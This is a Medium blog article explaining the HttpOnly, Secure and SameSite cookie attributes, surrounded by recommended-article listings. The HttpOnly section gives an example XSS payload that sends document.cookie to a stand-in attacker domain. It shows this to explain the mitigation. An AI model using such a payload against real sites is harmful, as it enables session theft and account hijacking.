Secure, HttpOnly, SameSite HTTP Cookies Attributes and Set-Cookie Explained

Published in

The Startup

4 min readSep 14, 2020

Cookies are the most common method to add temporary persistency to websites. They are used in most websites and we know their consent banners. HTTP Cookies can contain crucial and confidential data, their usage started around 1994 and some important legacy issue were left unaddressed and new state-of-art security improvements are being tackled nowadays.

Secure, HttpOnly and SameSite cookies attributes are being addressed by some modern browsers for quite some time and soon they will be enforced.

For example, starting from August 25, 2020, Google Chrome v85 enabled a feature, by default, to reject insecure SameSite=None. New features like this might break your website if you aren’t up-to-date with the latest best practices. Like that example, using the following attributes already are considered best practices and modern browsers will(and should) enforce them soon.

In this article I’m going to explain each one, the reasons why developers should care about them and why a correct implementation of them means extra security for your website.

HttpOnly attribute

HttpOnly attribute focus is to prevent access to cookie values via JavaScript, mitigation against Cross-site scripting (XSS) attacks.

Avoiding XSS may be mitigated just by sanitising user inputs and removing <script> tags, one small mistake can have huge consequences. Third party script might break user security as well. Every year we hear about these attacks being successful.

Imagine your webpage is storing a session cookie and there is some input field vulnerable to XSS. Then it’s quite straight-forward for an attack to inject script making a HTTP request to a url similar to the following:

`attackerDomain.com/cookie=${document.cookie}`

This works because document.cookie is accessible for any JavaScript code and prints all the cookie being used in the current domain. If you, indeed, have a session stored, the attacker will gain access to the user’s current session.

To prevent these hacks, we should be using HttpOnly flags in cookies.

Secure, HttpOnly, SameSite HTTP Cookies Attributes and Set-Cookie Explained

HttpOnly attribute

Written by João Manuel Gomes

More from João Manuel Gomes and The Startup

How to detect Password Manager Usage on a Website using JavaScript

I was challenged to detect the usage of password managers on my team’s website. In this article, I’m to explain what a password manager is…

I’ve Spent 16,733 Hours Studying Personal Finance — Here Are the 9 Most Important Money Rules

Budgeting and reducing expenses doesn’t make you wealthy

I Met a Quiet Millionaire Who Operates a $2.5m Tiny Business While Working 2-3 Hours a Day

This is bizarrely what he taught me

Fibonacci JavaScript Implementations Comparison

I had some free time and was going through some programming concepts and came across the famous fibonacci sequence.

Recommended from Medium

Finding DOM XSS in Javascript

Hey Security folks, this article is for beginner or mid level so I will explain every possible single code.

Difference Between Promise and Async/Await

If you’re reading this, you probably understand how the promise and async/await are different in the execution context.

Lists

Coding & Development

General Coding Knowledge

Stories to Help You Grow as a Software Developer

Tech & Tools

The ChatGPT Hype Is Over — Now Watch How Google Will Kill ChatGPT.

It never happens instantly. The business game is longer than you know.

The Architecture of a Modern Startup

Hype wave, pragmatic evidence vs the need to move fast

Fuzzing APIs

Fuzzing or Fuzz testing is an automated testing method where random, invalid, distorted, or unexpected input is given to an API Endpoint to…

IDOR in 30 minutes

Hii My Name is Om Dubey and I am a Bug Hunter. Recently I found a IDOR Vulnerability in a Private program.